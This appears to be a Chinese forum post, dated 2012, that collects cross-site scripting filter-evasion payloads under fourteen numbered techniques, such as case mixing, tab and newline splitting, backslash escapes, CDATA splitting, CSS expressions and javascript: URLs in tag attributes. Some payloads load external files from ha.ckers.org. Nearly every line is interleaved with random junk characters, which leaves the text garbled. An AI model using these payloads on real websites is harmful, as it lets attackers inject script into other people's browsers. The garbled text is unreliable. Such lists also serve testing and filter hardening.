1. 改变字符大小写
: \8 E& p5 \8 F8 p7 V/ ?, v
6 _- n" \# D+ [/ q. N# a % g5 p% |& l2 h" K; e$ W) o
* b. X+ b2 a/ w8 o. s% F
<sCript>alert(‘d’)</scRipT>
) S0 ?% ~( g& c2 M+ \- t/ G% u4 G! T' y% M: k3 \2 p, {# `9 O
2. 利用多加一些其它字符来规避Regular Expression的检查
& v8 ^8 m( q1 [" \) c& T, ]
/ }: D- u3 g1 ^8 j6 D' V7 @/ Y, l <<script>alert(‘c’)//<</script>, K. b+ Z, ^; P' r, @/ R8 p4 }
; P9 E7 a( ]* i+ B/ }
<SCRIPT a=">" SRC="t.js"></SCRIPT>+ \1 ?8 j9 \1 F/ `- |1 ]% i/ k
y. B: B! s Q/ T7 ~7 ] w* R
<SCRIPT =">" SRC="t.js"></SCRIPT>
2 c. |5 e: {& r& [6 n4 b) b f% c2 y" a( G j( c
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>% G& w0 p& }" B/ L1 l; k
/ K( L6 N# J8 H5 r* c) F
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
9 d, n+ K; [4 V% e8 {) N4 c5 }/ Q9 f, J. S+ A. }
<SCRIPT a=`>` SRC="t.js"></SCRIPT>* S+ F% ^0 A' ~' [5 y
# ?. P/ ]$ L. E. e3 o
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>% r( j- r$ M; ^% x0 i
: c! u' T4 U9 ^* `- Y6 N8 w9 b
3. 以其它扩展名取代.js9 S) p {& ~ V0 K
3 Z- R5 T) R' ?- [ <script src="bad.jpg"></script>
: C8 K* a8 J7 f6 X4 N+ ?+ J( g% o- } b& @ s
4. 将Javascript写在CSS档里 W5 }3 ]: c3 E
( i# l4 ?* }& K0 X, c* i
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
; M9 p S) v! H- m
- E5 m& @; a/ H4 [5 Z example:
- `+ f: Z: a! \5 i1 L; j- o% h
4 x/ b' z0 y7 ^" D) z body {! `3 ~3 U: {3 S }2 x
' r% j* d! g1 u, j# _. U! ]3 ] background-image: url(‘javascript:alert("XSS");’)
. `: |' i A, B2 A- K/ o' W0 X/ T B# ~, @9 m
}
- ~- V: s/ x- @( A
9 T( I6 O- y7 j# ~: i* L! g: A5. 在script的tag里加入一些其它字符
/ U/ O" Q7 g) S% }* z6 e7 R) i- V; G: p
<SCRIPT/SRC="t.js"></SCRIPT>
) b, Z( l3 x* _& J/ @, R3 _$ Z2 L
% m A- H6 |, f9 ]/ z# T <SCRIPT/anyword SRC="t.js"></SCRIPT>; ~6 v h3 ~ U" k6 s$ r
* J2 i* e- t# N; ]9 c6 m2 N+ P1 S6. 使用tab或是new line来规避
. V) Q* m& n$ b8 v. _- h
* ?, h* x$ q6 `7 B: v: s5 ?* j. r <img src="jav ascr ipt:alert(‘XSS3′)">
8 f- A" c! c8 p
( m$ \$ U, c3 r; ^7 k ?6 a <img src="jav ascr ipt:alert(‘XSS3′)">
& A8 y5 n% G$ d- @' K* Q- _" u
n/ t' `) C( S6 O <IMG SRC="jav ascript:alert(‘XSS’);">2 w r4 C3 @# s Z/ b- h' E
! d3 h, Y/ A& D7 G -> tag
6 q8 v% b. }) A+ S/ \+ v
: s! J1 }. n7 K( v" P -> new line
) h6 `" A0 {! c0 ]; @1 e- Y- ]' U: v
7. 使用"\"来规避# E( W w/ O0 i! U5 M0 K
+ @! v6 m, c% {3 ?3 G1 }
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>3 r4 _8 b# Y6 `8 Y ]
" W$ W" N- N e7 e* i$ a <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
+ m& }( y: k8 y- l! B4 S! b9 I1 \5 Q7 [9 @
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
2 ^) y2 p( M6 J7 h& F9 A
$ `( c; e9 J1 w6 x <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
f- K5 y* ^0 d2 k9 G" y+ l! H) \0 d0 s, Q3 R" B3 ~+ d$ n
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>; X- v/ @3 {( O K' K; `
9 p, U, {' r: H+ S# \! C z2 X8. 使用Hex encode来规避(也可能会把";"拿掉)9 I2 ?8 A9 V* v/ T0 `1 Y5 [
* ~( M" I7 g" O0 w5 l+ ?4 X$ W* O. ^ <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">$ F g8 h" L* I' {( c% N9 G0 K6 b
& X) E2 k) D" T# f; F% W
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
" X# Y- o l0 O8 o! o9 m3 k
: T; y; x6 V5 ^: s2 q5 I <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 a$ I8 C. n- \/ n+ g
- ]3 X: u6 l& S& r' e7 k9 A
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);"> J! c( N: A8 T: m
) m. \% g! j' y; |2 Z
9. script in HTML tag
; {1 ] A. _% s. ?
, y" Y- B3 J( g4 d7 `; d W <body onload=」alert(‘onload’)」>( J! ~3 n+ N! [; P4 W9 Y, s* J1 p' X
: C6 W0 N1 g% O' ] onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
1 d) k& L% I9 D9 O5 n
" S4 X9 k# m8 \/ q6 c10. 在swf里含有xss的code
# ]) K8 [9 P, h9 F: m% { F; Y3 e }; J3 ?$ l) ?
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>9 G: X: v8 ?! e8 z( d: @% ?0 t
# Z6 W( Z$ s- U: ~11. 利用CDATA将xss的code拆开,再组合起来。. S+ R. T, L; U- a
5 _9 Y6 s6 M+ Z# f/ B
<XML ID=I><X><C>
5 ~- o+ H7 G: r/ b Q) m4 o; C7 H# F
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>0 W; W% T+ G9 H: Y0 T6 \& p( W/ a
8 |& d1 [1 P! U+ b. p2 {
</C></X>; c7 I' D7 W8 e1 s3 \$ v2 Z) I/ N
* y0 v0 I @$ ~2 B$ N7 h
</xml>
; B1 k' Y$ l2 ^; H3 \4 T0 t) Z5 E2 J# `6 s& A# M! k
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>+ M1 m/ i1 d9 i# a x/ x' K4 T
( n' _+ f5 A; H' _- k <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>" F) E4 C% A+ H u' |
( i! b( p* @# U
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
6 a. @6 m; r) h( i0 P5 m2 @) l. x" Y* v* p, n, t9 j* u- W) q e2 x
12. 利用HTML+TIME。
; s2 Q! a! ?" \
3 X6 b+ ]+ ?1 c* N <HTML><BODY>
' ~9 p5 j& Z @2 l# y
/ F" ]1 n2 i" Y: V3 x1 T4 P; m; @ <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">& Z9 |5 l5 P) R! R3 T
' m! R7 V7 z9 y# G+ W% l) R0 R
<?import namespace="t" implementation="#default#time2">
, i" T6 v( Q3 o( r9 V3 j
9 `( P5 I# _7 ]1 D+ N" v <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">3 S5 R. g; t' S7 f
( p9 S5 A/ b- J# L. l </BODY></HTML>- g- @, [( ]' E2 s
5 I9 B7 ~& G8 p1 c13. 透过META写入Cookie。* j1 W& p& f: z: w/ F& ^
2 T* O8 _9 m% ]" v
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
3 i, _* D5 T# T& A8 d
3 e, ?$ Y U: V14. javascript in src , href , url
" g: x- n! L9 r. _/ M2 a: }+ V6 y X* \7 I2 [2 G
<IFRAME SRC=javascript:alert(’13′)></IFRAME>3 N6 E* X: K( J5 d9 o9 g0 T; e
9 K/ | I7 {9 l4 b: r" V
<img src="javascript:alert(‘XSS3′)">& q" x7 S1 P$ v
4 y8 n* p7 @" Q) V9 \
<IMG DYNSRC="javascript:alert(‘XSS20′)">
2 f9 m$ ~5 _6 W1 m; G) T/ q0 `! @8 x5 |# M
<IMG LOWSRC="javascript:alert(‘XSS21′)">& n2 z7 M7 s& n, [
! T8 k- Y/ w: V9 S" E4 O <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
" a* v9 R( m; |3 F+ n% h( z4 K7 y0 {+ b7 v3 N0 j( ?$ o7 A
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
# x3 ^) c2 b* T9 ?1 ~" _- D( e6 D; X7 [0 j. E" `0 X$ I* ^
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
1 A3 t) a- S2 ?
6 w P) J7 t$ M: }2 S/ K/ g <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
( Q: n; i( O, Y. ^/ d( O6 K/ o) A7 q" u9 C1 z$ s# x
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}: u! ]8 n! Q* F* \
7 H/ I1 z7 Z5 r4 j( {) ?, c% r </STYLE><A CLASS=XSS></A>: i0 h6 j7 ^5 v5 s6 T" O- O5 ^
) H) z! d9 E9 W' y* v7 A <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
2 `5 _: d% g6 T& o7 A r3 Y( c' p Y5 \2 g% L6 U) _" \0 l
|
发表于 2012-12-31 09:59:28
收藏
支持
反对